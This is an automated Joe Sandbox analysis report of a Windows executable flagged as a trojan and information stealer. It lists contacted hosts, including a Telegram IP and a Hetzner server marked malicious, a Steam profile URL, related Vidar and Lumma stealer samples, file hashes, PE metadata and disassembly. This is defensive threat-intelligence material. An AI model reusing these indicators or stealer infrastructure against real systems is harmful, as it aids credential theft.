                                          https://chrome.google.com/webstore?hl=enchrome.exe, 0000000C.00000002.2655346363.00000249DACD7000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgwt26ph.0.drfalse
                                              high
                                              https://lens.google.com/gen204chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://steamcommunity.com/profiles/76561199832267488dqu220Mozilla/5.0random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.com/tools/feedback/chrome/__submitchrome.exe, 0000000C.00000002.6585183116.00003CCC0053D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.comchrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://steamcommunity.com/profiles/76561199832267488random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700wt26ph.0.drfalse
                                                          high
                                                          https://calendar.google.comchrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYiwt26ph.0.drfalse
                                                              high
                                                              https://fonts.google.com/icons?selected=Materialchrome.exe, 0000000C.00000003.2420626371.00003CCC01898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420162161.00003CCC01848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420798445.00003CCC017AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)chrome.exe, 0000000C.00000002.5846593062.00003CCC000DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://apis.google.comchrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctawt26ph.0.drfalse
                                                                      high
                                                                      https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://clients4.google.com/chrome-sync/eventchrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ogs.google.comchrome.exe, 0000000C.00000002.5805027972.00003CCC00068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.com/imghp?hlchrome.exe, 0000000C.00000002.5871320655.00003CCC00128000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://chrome.google.com/webstorechrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com/searchchrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.google.com/update2/responsechrome.exe, 0000000C.00000002.2655107307.00000249DAA8D000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64wt26ph.0.drfalse
                                                                                      high
                                                                                      https://myaccount.google.com/shielded-email?utm_source=chrome2Bchrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://gemini.google.com/glic/intro?20chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://google-ohttp-relay-query.fastly-edge.com/chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://google.com/chrome.exe, 0000000C.00000002.5771387251.00003CCC00004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2Kchrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgwt26ph.0.drfalse
                                                                                                    high
                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/2Jchrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://m.google.com/devicemanagement/data/apichrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.google.comAccess-Control-Allow-Credentials:chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://outlook.office.com/calendar/chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-nchrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://gemini.google.com/glic2chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://chromewebstore.google.com/chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://ssl.google.cmanager.comchrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://csp.withgoogle.com/csp/report-to/gws/nonechrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      142.250.186.164
                                                                                                                      www.google.comUnited States
                                                                                                                      15169GOOGLEUSfalse
                                                                                                                      149.154.167.99
                                                                                                                      t.meUnited Kingdom
                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                      78.47.63.132
                                                                                                                      y.p.formaxprime.co.ukGermany
                                                                                                                      24940HETZNER-ASDEtrue
                                                                                                                      IP
                                                                                                                      127.0.0.1
                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                      Analysis ID:1643067
                                                                                                                      Start date and time:2025-03-19 13:59:12 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 12m 53s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:21
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Sample name:random(2).exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@34/1@4/4
                                                                                                                      EGA Information:Failed
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 0
                                                                                                                      • Number of non-executed functions: 0
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                                      • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.184.206, 142.250.186.99, 142.250.186.110, 173.194.76.84, 216.58.212.142, 142.250.185.238, 142.250.186.142, 20.12.23.50, 23.60.203.209, 20.189.173.26
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, self.events.data.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target random(2).exe, PID 6980 because there are no executed function
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      TimeTypeDescription
                                                                                                                      09:00:38API Interceptor31464405x Sleep call for process: random(2).exe modified
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/img/emoji/40/F09F9889.png
                                                                                                                      http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/img/favicon.ico
                                                                                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/?setln=pl
                                                                                                                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                      • telegram.dog/
                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                      • t.me/cinoshibot
                                                                                                                      78.47.63.132NWpNjnx.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                        random.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                          6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
                                                                                                                            qdS0ohqZBN.exeGet hashmaliciousVidarBrowse
                                                                                                                              FNLJD8Q3.exeGet hashmaliciousVidarBrowse
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                  work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                    v7942.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                      ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                        TEDGRQXB.exeGet hashmaliciousVidarBrowse
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          t.meSpacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          https://inkton.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.18.2.38
                                                                                                                                          DEVM28.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          CompiledProject.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          NWpNjnx.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          random.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          qdS0ohqZBN.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          9uB9RDznXl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          TELEGRAMRUimv-corp(ref0467) #U3010#U6ce8#U6587#U66f8#U3011sales Agreement WP2501001152 WP2501001159.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Spacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          https://inkton.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.16427.1083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          rPedidoCota____oPC250009846.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          MM-7925-0224_110_AD.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.10462.29769.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          1.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          DEVM28.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          rInstrument_bms_docx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          Spacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 94.130.189.58
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          https://teal-tamqrah-17.tiiny.io/1742248641265Get hashmaliciousUnknownBrowse
                                                                                                                                          • 144.76.124.123
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          https://learn.empowerskill.org/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 78.46.12.250
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Spacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          a.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          01903025ZW-BP001.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          Invio Ordine accompagnatorio n. 20250319-70611 del 03192025 - C.E.F. Srl.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          BSKDh.98374.10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          BSKDh.98374.10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          Objedn#U00e1vka (PO).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          New Purchase Order.exeGet hashmaliciousMSIL Logger, MassLogger RAT, XRedBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          aJODAZPOfw.dllGet hashmaliciousLatrodectusBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          HSUa315AJm.dllGet hashmaliciousLatrodectusBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\Desktop\random(2).exe
                                                                                                                                          File Type:ASCII text, with very long lines (1808), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10489
                                                                                                                                          Entropy (8bit):5.49400008804932
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:HnBRNC3YbBp6lR1+PaX56/x8lSz9/3/OHNBw8DXSl:Oee1M/xbUPwO0
                                                                                                                                          MD5:C285AF56A69C639A033B77359FEDE8A7
                                                                                                                                          SHA1:676A4F90E2ED82CB9ABEE7DAFC3A25D984B380EE
                                                                                                                                          SHA-256:ECF63A7733385EB825D49B5B351C0687E383F309D6849BE1C7AC06A1CD4E94B2
                                                                                                                                          SHA-512:53ABAF224CE47D77A6883AFCE25089C12D8362B4BCC01D94F94DF846C9F24AAFB2004502B7E3D5DC512E764B1EFB0B0E1FFC39FA5A423F82EA4E61B83E4E292E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.9442402156294
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:random(2).exe
                                                                                                                                          File size:1'822'720 bytes
                                                                                                                                          MD5:5e941e7c271e85093cb8344fb7cab50b
                                                                                                                                          SHA1:7a1f977cfd43da7dec3acfd45fcfea91f3acb76c
                                                                                                                                          SHA256:51c583db2595a3aefa45efaa70c8f0cc1394c18549746bc9fe654fedb9d17e57
                                                                                                                                          SHA512:cdb456a668820c3437261c8353945420bb66c99f982909152f7fe1c0e87d8b563353a7d50131c66ec870fe7523e02861f6885a60b0a25fb23c43aaa296c9fd5f
                                                                                                                                          SSDEEP:49152:nJ8+d3JCptdgyTPoluHZe7+MCpOPiDzzC8KG3HG:Jld3Ep7FTAA5e7+vpaZlG
                                                                                                                                          TLSH:2D8533032913A596E1640FFB33A36B177762564BA115382FDE2E5C2A9E2FF1D7C014CA
                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.....................d....... H...........@..........................PH.....C.......................................U...i..
                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                          Entrypoint:0x882000
                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x67BBFA01 [Mon Feb 24 04:48:01 2025 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:6
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:6
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:6
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                          Instruction
                                                                                                                                          jmp 00007F2944892D2Ah
                                                                                                                                          stmxcsr dword ptr [ebx]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add cl, ch
                                                                                                                                          add byte ptr [eax], ah
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], dh
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax+00h], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add dword ptr [edx], ecx
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          push es
                                                                                                                                          add byte ptr [eax], 00000000h
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add dword ptr [edx], ecx
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x280550x69.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000x40c.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x281f80x8.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
